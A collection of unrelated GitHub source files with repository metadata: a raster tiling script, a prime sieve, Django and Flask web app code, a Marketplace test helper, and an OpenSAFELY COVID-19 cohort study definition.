ds = driver.Create(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0]+'/PSUD_SAT50_'+str(fe_xmin+i*5000)+'_'+str(fe_ymin+j*5000)+'_2019_5KM.tif', xsize=width_dalle, ysize=height_dalle, bands=4, eType=gdal.GDT_Byte, options=['compress=deflate','predictor=2'])
ds.GetRasterBand(1).WriteArray(band_red)
ds.GetRasterBand(2).WriteArray(band_green)
ds.GetRasterBand(3).WriteArray(band_blue)
ds.GetRasterBand(4).WriteArray(band_alpha)
geot = [extent_dalle.xMinimum(), source.rasterUnitsPerPixelX(), 0, extent_dalle.yMaximum(), 0, -source.rasterUnitsPerPixelY()]
ds.SetGeoTransform(geot)
srs = osr.SpatialReference()
srs.ImportFromEPSG(int(source.crs().authid().split(':')[1]))
ds.SetProjection(srs.ExportToWkt())
ds = None
liste_vrt.append(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0] + '/PSUD_SAT50_'+str(fe_xmin+i*5000)+'_'+str(fe_ymin+j*5000)+'_2019_5KM.tif')
avance = int((i*((fe_ymax-fe_ymin)/5000)+j)*40/(((fe_xmax-fe_xmin)/5000)*((fe_ymax-fe_ymin)/5000)))
feedback.setProgress(60+avance)
if feedback.isCanceled():
return {'SUCCESS': False}
vrt_raster = self.generateVRT(liste_vrt,parameters,context,feedback)
self.generateOverview(parameters,context,feedback)
return {'SUCCESS': True}
| [
"hugo.roussaffa@province-sud.nc"
] | hugo.roussaffa@province-sud.nc |
e91547d2eac2de1f861288acbabd52cd114d8f97 | 6af9456a7d28b8e0688da062232ecfbb0cfa1644 | /sieve-of-eratosthenes.py | 784e2cff375dc6fcf401e851f1bfff07f4bed5ad | [] | no_license | vishalgupta99/algorithms | 322659bc02f28585bba6cb4f0dbf98d3d771fac2 | f3f43615999408b8a8b76eed1d4d02fb660982b2 | refs/heads/master | 2022-03-23T14:35:16.076562 | 2019-12-21T04:36:12 | 2019-12-21T04:36:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | def generatePrime(n):
prime = [1 for i in range(n+1)]
prime[0] = prime[1] = 0
for i in range(2,n+1):
if prime[i]==1:
for j in range(2,n//i+1):
prime[i*j]=0
l=[i for i in range(2,n+1) if prime[i]==1]
return l | [
"noreply@github.com"
] | noreply@github.com |
1c6e4bbb0fea1dd4e79f4dcbafb910d5774243f0 | 0c9b9084b7043f0e9d60b2dc3fb9c3f06292d5c6 | /django_project/urls.py | 410a5d628f204fa4778e5ea84c16529a5b7c39c3 | [] | no_license | tulsivanol/Django_Blog_Full_Framework | 5d349241d8feee17129b6148ad64c9b51ad3b647 | 8b1830e09fd3f97d5be11cae5137c00ea3b22af7 | refs/heads/master | 2022-12-15T05:16:07.426922 | 2020-02-12T03:48:20 | 2020-02-12T03:48:20 | 195,090,509 | 0 | 0 | null | 2022-11-22T04:38:41 | 2019-07-03T16:23:52 | Python | UTF-8 | Python | false | false | 2,527 | py | """django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
from users import views as user_view
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='users/logout.html'), name='logout'),
path('register/', user_view.register, name='register'),
path('profile/', user_view.profile, name='profile'),
path('password-reset/',
auth_views.PasswordResetView.as_view(
template_name='users/password_reset.html'
),
name='password_reset'),
path('password-reset/done/',
auth_views.PasswordResetDoneView.as_view(
template_name='users/password_reset_done.html'
),
name='password_reset_done'),
path('password-reset-confirm/<uidb64>/<token>/',
auth_views.PasswordResetConfirmView.as_view(
template_name='users/password_reset_confirm.html'
),
name='password_reset_confirm'),
path('password-reset-complete/',
auth_views.PasswordResetCompleteView.as_view(
template_name='users/password_reset_complete.html'
),
name='password_reset_complete'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"tulsivanol@gmail.com"
] | tulsivanol@gmail.com |
1b52f997a4a8cab3a5632bba2673f94fcfa4afa6 | 1ae59950632eb42be218f475b11ec8d5421d25c3 | /app/models/user.py | 0197d203851fcbbd6681788ecbe04e9c784eca9c | [] | no_license | peterjuse/proyecto-ati | 7006678b2411ef3d4dca4d94e33f2aec6edb8295 | 9db19fff562c470c3083cd1d3df1ee8759f8a687 | refs/heads/master | 2016-09-06T02:13:43.928970 | 2015-04-08T04:34:54 | 2015-04-08T04:34:54 | 33,454,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,899 | py | import psycopg2
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
import re
class User:
def __init__(self):
self.id = None
self.username = None
self.password_hash = None
self.email = None
self.name = None
self.lastname = None
self.country = None
self.city = None
self.member_since = None
self.last_seen = None
# Crea un usuario
def create(self, username, email, password, name, lastname, city=None, country=None):
if(username and email and password and name and lastname):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
ref_database.execute("select nextval('user_seq');")
self.id = ref_database.fetchone()[0]
self.username = username
self.password_hash = generate_password_hash(password)
self.email = email
self.name = name
self.lastname = lastname
self.city = city
self.country = country
ref_database.execute('select now();')
self.member_since = self.last_seen = ref_database.fetchone()[0]
ref_database.execute('insert into users values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);', (self.id, self.email, self.password_hash, self.username, self.name, self.lastname, self.city, self.country, self.member_since, self.last_seen,))
connection.commit()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return True
return False
def get(self,username,id=None):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Consulta:
if id == None:
ref_database.execute('select * from users where username = %s;',(username,))
result = ref_database.fetchone()
if result:
self.id = result[0]
self.username = result[1]
self.password_hash = result[2]
self.email = result[3]
self.name = result[4]
self.lastname = result[5]
self.country = result[6]
self.city = result[7]
self.member_since = result[8]
self.last_seen = result[9]
else:
return False
else:
ref_database.execute('select * from users where id = %s;',(id,))
result = ref_database.fetchone()
if result:
self.id = result[0]
self.username = result[1]
self.password_hash = result[2]
self.email = result[3]
self.name = result[4]
self.lastname = result[5]
self.country = result[6]
self.city = result[7]
self.member_since = result[8]
self.last_seen = result[9]
else:
return False
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return self
#retorna informacion de un usuario
def id(self):
return self.id
def username(self):
return self.username
def email(self):
return self.email
def name(self):
return self.name
def lastname(self):
return self.lastname
def city(self):
return self.city
def country(self):
return self.country
def last_seen(self):
return self.last_seen
def nro_pasties_privates(self):
return len(self.pasties(private=1))
def nro_pasties_publics(self):
return len(self.pasties())
def avatar(self, size, default = 'identicon'):
if self.id:
hash = hashlib.md5(self.username.encode('utf-8')).hexdigest()
return 'http://www.gravatar.com/avatar/%s?s=%d&d=%s' % (hash, size, default)
return None
# Actualiza informacion de un usuario
def set(self, email=None, password=None, name=None, lastname=None, city=None, country=None):
if (email or password or name or lastname or city or country):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
if email:
self.email = email
if password:
self.password_hash = generate_password_hash(password)
if name:
self.name = name
if lastname:
self.lastname = lastname
if city:
self.city = city
if country:
self.country = country
ref_database.execute('update users set email=%s, password=%s name=%s, lastname=%s, country=%s, city=%s where id=%s;', (self.email, self.password_hash, self.name, self.lastname, self.country, self.city, self.id,))
connection.commit()
ref_database.close()
connection.close()
return True
return False
# Elimina un usuario
def delete(self):
if self.id:
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
ref_database.execute('delete from users where id=%s;', (self.id,))
connection.commit()
self.id = None
self.username = None
self.email = None
self.name = None
self.lastname = None
self.country = None
self.city = None
self.member_since = None
self.last_seen = None
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return True
return False
# Verificacion de password
def verifyPassword(self, password):
return check_password_hash(self.password_hash, password)
#Actualizando la fecha de ultima vista
def updateLastSeen(self):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
ref_database.execute('select now();')
self.last_seen = ref_database.fetchone()[0]
ref_database.execute('update users set last_seen=%s where id=%s;', (self.last_seen,self.id))
connection.commit()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return True
# Retorna todos los pasties (publicos y privados) de un user
def pasties(self,private=None):
if self.id:
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Consulta:
if private == None:
ref_database.execute('select * from pasties where owner=%s order by last_modified desc;', (self.id,))
else:
ref_database.execute('select * from pasties where owner=%s and private=%s order by last_modified desc;', (self.id,'True',))
result = ref_database.fetchall()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return result
return None
def pasties_per_page(self, page, size):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Consulta:
offset = page*size
ref_database.execute('select * from pasties where owner=%s order by last_modified desc limit %s offset %s;', (size, offset,))
result = ref_database.fetchall()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return result
# Retorna todos los usuarios
def all(self):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Consulta:
ref_database.execute('select * from users order by name asc;')
result = ref_database.fetchall()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return result
def per_page(self, page, size):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Consulta:
offset = page*size
ref_database.execute('select * from users order by name desc limit %s offset %s;', (size, offset,))
result = ref_database.fetchall()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return result
# Metodos para autenticacion con flask-login
def is_authenticated(self): #No hay ningun tipo de bloqueos de cuenta
return True
def is_active(self): # No hay desactivacion de cuenta
return True
def is_anonymous(self): #Todos los usuarios que realizan acciones directas tienen que ser registrados
return False
def get_id(self):
if self.id:
return unicode(self.id)
return None
# Validaciones username
@staticmethod
def unique_username(username):
result = None
if username:
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Verificando unicidad del username:
ref_database.execute('select username from users where username = %s;',(username,))
resultado = ref_database.fetchone()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
if resultado==username:
result= False
else:
result=True
return result
@staticmethod
def valid_username(username):
result = None
if username:
result = re.match("@?(\w){3,16}", username)
return result
#Validaciones email
@staticmethod
def unique_email(email):
result = None
if email:
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Verificando unicidad del username:
ref_database.execute('select email from users where email = %s;',(email,))
resultado = ref_database.fetchone()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
if resultado==email:
result=False
else:
result=True
return result
@staticmethod
def valid_email(email):
result = None
if email:
result = re.match("^[\w.\+-]+@[\w-]+\.[\w.-]+$", email)
return result
#Validaciones nombre y apellido
@staticmethod
def valid_name(name):
result = None
if name:
result = re.match("^[a-zA-Z_]+$", name)
return result
#Validacion del password:
@staticmethod
def valid_password(password):
result = None
if password:
result = re.match("^[!#\$%&\?\*-\+\(\)\w]){5,}$", password)
return result | [
"pedro.boll22@gmail.com"
] | pedro.boll22@gmail.com |
be89e3bb2bcbb432edbcf5ef7805532ee5823d5d | 30dc32fd39cf71c76fc24d53b68a8393adcac149 | /OWDTestToolkit/apps/Marketplace/__main.py | a24d1a6405e92cfdd242bbf8fe55cd7389288a89 | [] | no_license | carlosmartineztoral/OWD_TEST_TOOLKIT | 448caefdc95bc3e54aad97df0bff7046ffb37be1 | 50768f79488735eba8355824f5aa3686a71d560a | refs/heads/master | 2021-01-15T17:14:03.614981 | 2013-06-11T12:48:18 | 2013-06-11T12:48:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,357 | py | from OWDTestToolkit.global_imports import *
import installApp ,\
searchForApp ,\
selectSearchResultApp
class Marketplace (
installApp.main,
searchForApp.main,
selectSearchResultApp.main):
def __init__(self, p_parent):
self.apps = p_parent.apps
self.data_layer = p_parent.data_layer
self.parent = p_parent
self.marionette = p_parent.marionette
self.UTILS = p_parent.UTILS
def launch(self):
#
# Launch the app.
#
self.apps.kill_all()
# WARNING: Marketplace is in a weird place - you need to use "Marketplace Dev"!!
# self.app = self.apps.launch(self.__class__.__name__)
self.UTILS.logResult("info",
"About to launch the marketplace app from the dev server. " + \
"If it's \"not found\" then either try again later, or contact #marketplace mozilla irc channel.")
self.app = self.apps.launch("Marketplace Dev")
self.UTILS.waitForNotElements(DOM.Market.market_loading_icon,
self.__class__.__name__ + " app - loading icon",
True,
30)
| [
"roy.collings@sogeti.com"
] | roy.collings@sogeti.com |
fe23f1d97649e353b053a3620c8b511e663df446 | b11e02c71b0076906cb67599ffef25bf4682d72a | /server/community/models.py | fc2c6c3093222bbfbfae359f5a677d4e71c9d91d | [] | no_license | kimth1113/SMB | e4a8d8ad7723c4e7752e3ba5c5bd35828d2b7443 | 5ebb9e458631348872a15524c15283933a7662b3 | refs/heads/master | 2023-08-17T04:19:45.389507 | 2021-10-05T17:01:26 | 2021-10-05T17:01:26 | 413,904,194 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | from django.db import models
from django.conf import settings
# Create your models here.
class Article(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
username = models.TextField()
title = models.CharField(max_length=200)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Comment(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
article = models.ForeignKey(Article, on_delete=models.CASCADE)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
| [
"kimth1113@gmail.com"
] | kimth1113@gmail.com |
df9384d60dcde3fb318a9b646d98debfab15d79a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03578/s404612965.py | ac57b84158a4259a926ce398a0358c3c359d58d5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 740 | py | # -*- coding: utf-8 -*-
import sys
from collections import deque, defaultdict
from math import sqrt, factorial
# def input(): return sys.stdin.readline()[:-1] # warning not \n
# def input(): return sys.stdin.buffer.readline().strip() # warning bytes
# def input(): return sys.stdin.buffer.readline().decode('utf-8')
def solve():
n = int(input())
d = defaultdict(int)
a = [int(x) for x in input().split()]
for e in a:
d[e] += 1
m = int(input())
t = [int(x) for x in input().split()]
for e in t:
if d[e]:
d[e] -= 1
else:
print("NO")
return
print("YES")
t = 1
# t = int(input())
for case in range(1,t+1):
ans = solve()
"""
1 + k
"""
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
62f20dcdc8cee3063b8ddfaabbbb4f14a6f03aad | a52f4e1a3f8961fe0bcb5728848d5b9b3e9b705f | /analysis/study_definition.py | b8ce30ffbdb771aa3afa9abf1fa3b5058a7daab6 | [
"MIT"
] | permissive | opensafely/SGTF-CFR-research | 0caaf68906172fa67d06686fedc6d5ad5b99e508 | 4163e86b22b9a7056476db57ab8f88d37a1f65a7 | refs/heads/master | 2023-08-23T10:48:08.243296 | 2021-11-16T12:23:46 | 2021-11-16T12:23:46 | 335,903,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,524 | py | # IMPORT STATEMENTS
# This imports the cohort extractor package. This can be downloaded via pip
from cohortextractor import (
StudyDefinition,
patients,
codelist_from_csv,
codelist,
combine_codelists,
filter_codes_by_category,
)
# dictionary of MSOA codes (for dummy data)
from dictionaries import dict_msoa
# IMPORT CODELIST DEFINITIONS FROM CODELIST.PY (WHICH PULLS THEM FROM
# CODELIST FOLDER
from codelists import *
# STUDY DEFINITION
# Defines both the study population and points to the important covariates and outcomes
study = StudyDefinition(
default_expectations={
"date": {"earliest": "1970-01-01", "latest": "today"},
"rate": "uniform",
"incidence": 0.2,
},
# STUDY POPULATION - registered 1 year prior to November 16th 2020
population=patients.satisfying(
"one_practice AND sgss_pos_inrange",
one_practice=patients.registered_with_one_practice_between(
"2019-11-16", "2020-11-16"
),
),
dereg_date=patients.date_deregistered_from_all_supported_practices(
on_or_after="2020-11-16", date_format="YYYY-MM",
),
# OUTCOMES - ONS death dates
died_ons_covid_flag_any=patients.with_these_codes_on_death_certificate(
covid_codelist,
on_or_after="2020-02-01",
match_only_underlying_cause=False,
return_expectations={"date": {"earliest": "2020-02-01"}, "incidence" : 0.5},
),
died_date_ons=patients.died_from_any_cause(
on_or_after="2020-02-01",
returning="date_of_death",
include_month=True,
include_day=True,
return_expectations={"date": {"earliest": "2020-08-01"}, "incidence" : 0.5},
),
### Primary care COVID cases
covid_tpp_probable=patients.with_these_clinical_events(
combine_codelists(covid_identification_in_primary_care_case_codes_clinical,
covid_identification_in_primary_care_case_codes_test,
covid_identification_in_primary_care_case_codes_seq),
return_first_date_in_period=True,
include_day=True,
return_expectations={"date": {"earliest": "2020-10-20"}, "incidence" : 0.2},
),
# Any COVID vaccination (first dose)
covid_vacc_date=patients.with_tpp_vaccination_record(
target_disease_matches="SARS-2 CORONAVIRUS",
on_or_after="2020-12-01", # check all december to date
find_first_match_in_period=True,
returning="date",
date_format="YYYY-MM-DD",
return_expectations={
"date": {
"earliest": "2020-12-08", # first vaccine administered on the 8/12
"latest": "2021-01-31",
},
"incidence":0.1
},
),
### COVID test positive (SGSS)
first_pos_test_sgss=patients.with_test_result_in_sgss(
pathogen="SARS-CoV-2",
test_result="positive",
find_first_match_in_period=True,
returning="date",
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-06-01"},
"incidence": 0.4
},
),
### SGSS positive in study period
sgss_pos_inrange=patients.with_test_result_in_sgss(
pathogen="SARS-CoV-2",
test_result="positive",
find_first_match_in_period=True,
between=["2020-11-16", "2021-01-11"],
returning="date",
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-11-16", "latest": "2021-01-11"},
"incidence": 0.9
},
),
sgtf=patients.with_test_result_in_sgss(
pathogen="SARS-CoV-2",
test_result="positive",
find_first_match_in_period=True,
between=["2020-11-16", "2021-01-11"],
returning="s_gene_target_failure",
return_expectations={
"rate": "universal",
"category": {"ratios": {"0": 0.4, "1": 0.4, "9": 0.1, "": 0.1}},
},
),
# SUS HOSPITAL ADMISSION
covid_admission_date=patients.admitted_to_hospital(
returning= "date_admitted",
with_these_diagnoses=covid_codelist,
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-11-16"}, "incidence" : 0.3},
),
covid_discharge_date=patients.admitted_to_hospital(
returning= "date_discharged",
with_these_diagnoses=covid_codelist,
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-11-16"}, "incidence" : 0.2},
),
# DAYS SPENT IN ICU
covid_icu_days=patients.admitted_to_hospital(
returning= "days_in_critical_care",
with_these_diagnoses=covid_codelist,
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
return_expectations={
"category": {"ratios": {"10": 0.5, "20": 0.5}},
"incidence": 0.4,
},
),
# ICU ADMISSION
icu_admission_date=patients.admitted_to_icu(
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
returning="date_admitted",
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest" : "2020-11-16"}, "incidence" : 0.2},
),
### DEMOGRAPHIC COVARIATES
# AGE
age=patients.age_as_of(
"sgss_pos_inrange",
return_expectations={
"rate": "universal",
"int": {"distribution": "population_ages"},
},
),
# SEX
sex=patients.sex(
return_expectations={
"rate": "universal",
"category": {"ratios": {"M": 0.49, "F": 0.51}},
}
),
# DEPRIVIATION
imd=patients.address_as_of(
"sgss_pos_inrange",
returning="index_of_multiple_deprivation",
round_to_nearest=100,
return_expectations={
"rate": "universal",
"category": {"ratios": {"100": 0.1, "200": 0.2, "300": 0.2, "400": 0.2, "500": 0.2, "600": 0.1}},
},
),
# GEOGRAPHIC REGION CALLED STP
stp=patients.registered_practice_as_of(
"sgss_pos_inrange",
returning="stp_code",
return_expectations={
"rate": "universal",
"category": {
"ratios": {
"STP1": 0.1,
"STP2": 0.1,
"STP3": 0.1,
"STP4": 0.1,
"STP5": 0.1,
"STP6": 0.1,
"STP7": 0.1,
"STP8": 0.1,
"STP9": 0.1,
"STP10": 0.1,
}
},
},
),
# GEOGRAPHIC REGION MSOA
msoa=patients.registered_practice_as_of(
"sgss_pos_inrange",
returning="msoa_code",
return_expectations={
"rate": "universal",
"category": {"ratios": dict_msoa},
},
),
# REGION - one of NHS England 9 regions
region=patients.registered_practice_as_of(
"sgss_pos_inrange",
returning="nuts1_region_name",
return_expectations={
"rate": "universal",
"category": {
"ratios": {
"North East": 0.1,
"North West": 0.1,
"Yorkshire and The Humber": 0.1,
"East Midlands": 0.1,
"West Midlands": 0.1,
"East of England": 0.1,
"London": 0.2,
"South East": 0.1,
"South West": 0.1,
},
},
},
),
# RURAL OR URBAN LOCATION
rural_urban=patients.address_as_of(
"sgss_pos_inrange",
returning="rural_urban_classification",
return_expectations={
"rate": "universal",
"category":
{"ratios": {
"1": 0.1,
"2": 0.1,
"3": 0.1,
"4": 0.1,
"5": 0.1,
"6": 0.1,
"7": 0.2,
"8": 0.2,
}
},
},
),
# HOUSEHOLD INFORMATION
household_id=patients.household_as_of(
"2020-02-01",
returning="pseudo_id",
return_expectations={
"int": {"distribution": "normal", "mean": 1000, "stddev": 200},
"incidence": 1,
},
),
household_size=patients.household_as_of(
"2020-02-01",
returning="household_size",
return_expectations={
"int": {"distribution": "normal", "mean": 3, "stddev": 1},
"incidence": 1,
},
),
care_home_type=patients.care_home_status_as_of(
"sgss_pos_inrange",
categorised_as={
"PC": """
IsPotentialCareHome
AND LocationDoesNotRequireNursing='Y'
AND LocationRequiresNursing='N'
""",
"PN": """
IsPotentialCareHome
AND LocationDoesNotRequireNursing='N'
AND LocationRequiresNursing='Y'
""",
"PS": "IsPotentialCareHome",
"U": "DEFAULT",
},
return_expectations={
"rate": "universal",
"category": {"ratios": {"PC": 0.05, "PN": 0.05, "PS": 0.05, "U": 0.85,},},
},
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/10
bmi=patients.most_recent_bmi(
between=["2010-02-01", "sgss_pos_inrange"],
minimum_age_at_measurement=16,
include_measurement_date=True,
include_month=True,
return_expectations={
"date": {},
"float": {"distribution": "normal", "mean": 35, "stddev": 10},
"incidence": 0.95,
},
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/6
smoking_status=patients.categorised_as(
{
"S": "most_recent_smoking_code = 'S'",
"E": """
most_recent_smoking_code = 'E' OR (
most_recent_smoking_code = 'N' AND ever_smoked
)
""",
"N": "most_recent_smoking_code = 'N' AND NOT ever_smoked",
"M": "DEFAULT",
},
return_expectations={
"category": {"ratios": {"S": 0.6, "E": 0.1, "N": 0.2, "M": 0.1}}
},
most_recent_smoking_code=patients.with_these_clinical_events(
clear_smoking_codes,
find_last_match_in_period=True,
on_or_before="sgss_pos_inrange",
returning="category",
),
ever_smoked=patients.with_these_clinical_events(
filter_codes_by_category(clear_smoking_codes, include=["S", "E"]),
on_or_before="sgss_pos_inrange",
),
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/27
ethnicity=patients.with_these_clinical_events(
ethnicity_codes,
returning="category",
find_last_match_in_period=True,
include_date_of_match=True,
return_expectations={
"category": {"ratios": {"1": 0.75, "2": 0.05, "3": 0.05, "4": 0.05, "5": 0.1}},
"incidence": 0.75,
},
),
ethnicity_16=patients.with_these_clinical_events(
ethnicity_codes_16,
returning="category",
find_last_match_in_period=True,
include_date_of_match=True,
return_expectations={
"category": {"ratios": {"1": 0.8, "5": 0.1, "3": 0.1}},
"incidence": 0.75,
},
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/21
chronic_respiratory_disease=patients.with_these_clinical_events(
chronic_respiratory_disease_codes,
return_first_date_in_period=True,
include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/55
asthma=patients.categorised_as(
{
"0": "DEFAULT",
"1": """
(
recent_asthma_code OR (
asthma_code_ever AND NOT
copd_code_ever
)
) AND (
prednisolone_last_year = 0 OR
prednisolone_last_year > 4
)
""",
"2": """
(
recent_asthma_code OR (
asthma_code_ever AND NOT
copd_code_ever
)
) AND
prednisolone_last_year > 0 AND
prednisolone_last_year < 5
""",
},
return_expectations={"category": {"ratios": {"0": 0.8, "1": 0.1, "2": 0.1}},},
recent_asthma_code=patients.with_these_clinical_events(
asthma_codes, between=["2017-02-01", "2020-11-16"],
),
asthma_code_ever=patients.with_these_clinical_events(asthma_codes),
copd_code_ever=patients.with_these_clinical_events(
chronic_respiratory_disease_codes
),
prednisolone_last_year=patients.with_these_medications(
pred_codes,
between=["2019-11-16", "2020-11-16"],
returning="number_of_matches_in_period",
),
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/7
chronic_cardiac_disease=patients.with_these_clinical_events(
chronic_cardiac_disease_codes,
return_first_date_in_period=True,
include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/30
diabetes=patients.with_these_clinical_events(
diabetes_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/32
lung_cancer=patients.with_these_clinical_events(
lung_cancer_codes, return_first_date_in_period=True, include_month=True,
),
haem_cancer=patients.with_these_clinical_events(
haem_cancer_codes, return_first_date_in_period=True, include_month=True,
),
other_cancer=patients.with_these_clinical_events(
other_cancer_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/12
chronic_liver_disease=patients.with_these_clinical_events(
chronic_liver_disease_codes,
return_first_date_in_period=True,
include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/14
other_neuro=patients.with_these_clinical_events(
other_neuro, return_first_date_in_period=True, include_month=True,
),
stroke=patients.with_these_clinical_events(
stroke, return_first_date_in_period=True, include_month=True,
),
dementia=patients.with_these_clinical_events(
dementia, return_first_date_in_period=True, include_month=True,
),
# Chronic kidney disease
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/17
creatinine=patients.with_these_clinical_events(
creatinine_codes,
find_last_match_in_period=True,
on_or_before="2020-11-16",
returning="numeric_value",
include_date_of_match=True,
include_month=True,
return_expectations={
"float": {"distribution": "normal", "mean": 60.0, "stddev": 15},
"date": {"earliest": "2019-02-28", "latest": "2020-11-16"},
"incidence": 0.95,
},
),
dialysis=patients.with_these_clinical_events(
dialysis_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/31
organ_transplant=patients.with_these_clinical_events(
organ_transplant_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/13
dysplenia=patients.with_these_clinical_events(
spleen_codes, return_first_date_in_period=True, include_month=True,
),
sickle_cell=patients.with_these_clinical_events(
sickle_cell_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/36
aplastic_anaemia=patients.with_these_clinical_events(
aplastic_codes, return_last_date_in_period=True, include_month=True,
),
hiv=patients.with_these_clinical_events(
hiv_codes,
returning="category",
find_first_match_in_period=True,
include_date_of_match=True,
include_month=True,
return_expectations={
"category": {"ratios": {"43C3.": 0.8, "XaFuL": 0.2}},
},
),
permanent_immunodeficiency=patients.with_these_clinical_events(
permanent_immune_codes, return_first_date_in_period=True, include_month=True,
),
temporary_immunodeficiency=patients.with_these_clinical_events(
temp_immune_codes, return_last_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/23
# immunosuppressant_med=
# hypertension
hypertension=patients.with_these_clinical_events(
hypertension_codes, return_first_date_in_period=True, include_month=True,
),
# Blood pressure
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/35
bp_sys=patients.mean_recorded_value(
systolic_blood_pressure_codes,
on_most_recent_day_of_measurement=True,
on_or_before="2020-11-16",
include_measurement_date=True,
include_month=True,
return_expectations={
"float": {"distribution": "normal", "mean": 80, "stddev": 10},
"date": {"latest": "2020-11-16"},
"incidence": 0.95,
},
),
bp_dias=patients.mean_recorded_value(
diastolic_blood_pressure_codes,
on_most_recent_day_of_measurement=True,
on_or_before="2020-11-16",
include_measurement_date=True,
include_month=True,
return_expectations={
"float": {"distribution": "normal", "mean": 120, "stddev": 10},
"date": {"latest": "2020-11-16"},
"incidence": 0.95,
},
),
hba1c_mmol_per_mol=patients.with_these_clinical_events(
hba1c_new_codes,
find_last_match_in_period=True,
